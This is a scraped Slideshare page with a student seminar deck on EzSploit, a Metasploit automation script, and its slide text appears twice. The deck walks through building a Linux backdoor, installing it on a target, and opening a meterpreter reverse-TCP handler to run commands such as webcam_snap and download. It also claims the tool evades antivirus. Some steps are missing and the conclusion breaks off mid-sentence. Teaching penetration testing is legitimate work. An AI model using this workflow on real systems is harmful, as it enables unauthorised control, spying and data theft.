際際滷

際際滷Share a Scribd company logo

Lifnaaaaaa e

Download as PPTX, PDF
H
henelpj

EzSploit is a Linux bash script that automates the use of Metasploit to hack Linux systems. It allows easy generation of backdoors for Linux, Windows, and Android by compiling payloads and files to target specific platforms. The document outlines how to use EzSploit to create payloads, set up a multi-handler on Kali Linux to receive the payload, install the payload on a target Linux system, and then issue commands through Metasploit's meterpreter shell to control the victim system. It concludes by advising users to keep their systems updated and use antivirus software to protect against backdoors created by tools like EzSploit.

1 of 19
Download to read offline
EzSploit -Linux Guide InCharge, Teenu V Therese Dept.of ComputerApplication Presented By, LifnaThankachan MCA LE S3 Roll No.:32
CONTENTS Introduction Kali Linux Penetration testing The EZsploit Introduction to The EZsploit Advantages & Disadvantages Steps to Hacking Linux with EZsploit Payload File Creation Sending payload To the Target Commands to exploits victims Linux Conclusion
INTRODUCTION ON KALI LINUX Debian-basedLinuxdistributionaimedat advanced PenetrationTestingand Security Auditing. ReleaseDate:March13th, 2013. Security-focusedversionof Linux that offers a large numberof toolsto seekoutweaknesses and secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch ComputerForensicsand ReverseEngineering
Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. BENEFITS: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatory requirements PENETRATION TESTING
MAIN TERMS Exploit Payload Lhost Lport Meterpreter
EZsploit EZsploit : Linux bash script automation for Metasploit. Metasploit Framework : Based on Ruby modular penetration testing platform Enables to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It provide a complete environment for penetration testing and exploit development.
Easy tool to generate backdoor for Linux, windows and Android The tool is able to compile the viruses with popular payloads and then compile the resulting file to run a specific platform Linux,Microsoft Windows, Android In addition all malware which have been crafted by The ezsploit can bypass many of the popular anti-virus software protection features. The malware that created with this tool also have an ability to bypass most AV software
Advantages &Disadvantages Open source Frequently updated Easy to deploy Disadvantages Difficult to learn Can crash your system if not used wisely Requires deep knowledge for exploit development
Some other tools Related to: FATRAT (taken by Jithu(Linux) ARMITAGE(taken by Ayana(Linux)) EASYSPLOIT (taken by Merin Babu(Linux))
HACKING Linux STEP 1. You need to download ezsploit git clone https://github.com/rand0m1ze/ezsploit.git
STEP2 . execute the command cd ezsploit Setting the permission chmod +x ezsploit.sh Now you can run this tool easily ./ezsploit.sh
STEP 3. Create the payload for type 1.
STEP 4. Create the payload for Linux device the execute the associated number like 2.
STEP 5. Set LHOST IP Set LPORT
STEP 6: Install payload on another system STEP 7: Set the multi/handler msf > use exploit/multi/handler Payload Handlerisa module that provides all the featuresof the metasploit payload systemto exploit. STEP 8:Set the payload msf exploit(multi/handler) > set payload/ Linux/x86/meterpreter/reverse_tcp
STEP 9: Set the Local Host The IP address you want your listener to bind to msf exploit(handler) > set LHOST 192.168.43.166 STEP 10: Set the Local Port msf exploit(handler) > set LPORT 6666
STEP 13: enter the command Exploit We can now interact with the victim & perform different commands.
Using Commands ifconfig kill sysinfo localtime webcam_snap webcam_stream download upload
CONCLUSION Keep your System up to date. Installing antivirus software on your system. The backdoor application when installed and turned on the system allows attacker to read, write and modify data. Cautions are:

More Related Content

Lifnaaaaaa e

  • 1. EzSploit -Linux Guide InCharge, Teenu V Therese Dept.of ComputerApplication Presented By, LifnaThankachan MCA LE S3 Roll No.:32
  • 2. CONTENTS Introduction Kali Linux Penetration testing The EZsploit Introduction to The EZsploit Advantages & Disadvantages Steps to Hacking Linux with EZsploit Payload File Creation Sending payload To the Target Commands to exploits victims Linux Conclusion
  • 3. INTRODUCTION ON KALI LINUX Debian-basedLinuxdistributionaimedat advanced PenetrationTestingand Security Auditing. ReleaseDate:March13th, 2013. Security-focusedversionof Linux that offers a large numberof toolsto seekoutweaknesses and secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch ComputerForensicsand ReverseEngineering
  • 4. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. BENEFITS: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatory requirements PENETRATION TESTING
  • 6. EZsploit EZsploit : Linux bash script automation for Metasploit. Metasploit Framework : Based on Ruby modular penetration testing platform Enables to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It provide a complete environment for penetration testing and exploit development.
  • 7. Easy tool to generate backdoor for Linux, windows and Android The tool is able to compile the viruses with popular payloads and then compile the resulting file to run a specific platform Linux,Microsoft Windows, Android In addition all malware which have been crafted by The ezsploit can bypass many of the popular anti-virus software protection features. The malware that created with this tool also have an ability to bypass most AV software
  • 8. Advantages &Disadvantages Open source Frequently updated Easy to deploy Disadvantages Difficult to learn Can crash your system if not used wisely Requires deep knowledge for exploit development
  • 9. Some other tools Related to: FATRAT (taken by Jithu(Linux) ARMITAGE(taken by Ayana(Linux)) EASYSPLOIT (taken by Merin Babu(Linux))
  • 10. HACKING Linux STEP 1. You need to download ezsploit git clone https://github.com/rand0m1ze/ezsploit.git
  • 11. STEP2 . execute the command cd ezsploit Setting the permission chmod +x ezsploit.sh Now you can run this tool easily ./ezsploit.sh
  • 12. STEP 3. Create the payload for type 1.
  • 13. STEP 4. Create the payload for Linux device the execute the associated number like 2.
  • 14. STEP 5. Set LHOST IP Set LPORT
  • 15. STEP 6: Install payload on another system STEP 7: Set the multi/handler msf > use exploit/multi/handler Payload Handlerisa module that provides all the featuresof the metasploit payload systemto exploit. STEP 8:Set the payload msf exploit(multi/handler) > set payload/ Linux/x86/meterpreter/reverse_tcp
  • 16. STEP 9: Set the Local Host The IP address you want your listener to bind to msf exploit(handler) > set LHOST 192.168.43.166 STEP 10: Set the Local Port msf exploit(handler) > set LPORT 6666
  • 17. STEP 13: enter the command Exploit We can now interact with the victim & perform different commands.
  • 18. Using Commands ifconfig kill sysinfo localtime webcam_snap webcam_stream download upload
  • 19. CONCLUSION Keep your System up to date. Installing antivirus software on your system. The backdoor application when installed and turned on the system allows attacker to read, write and modify data. Cautions are: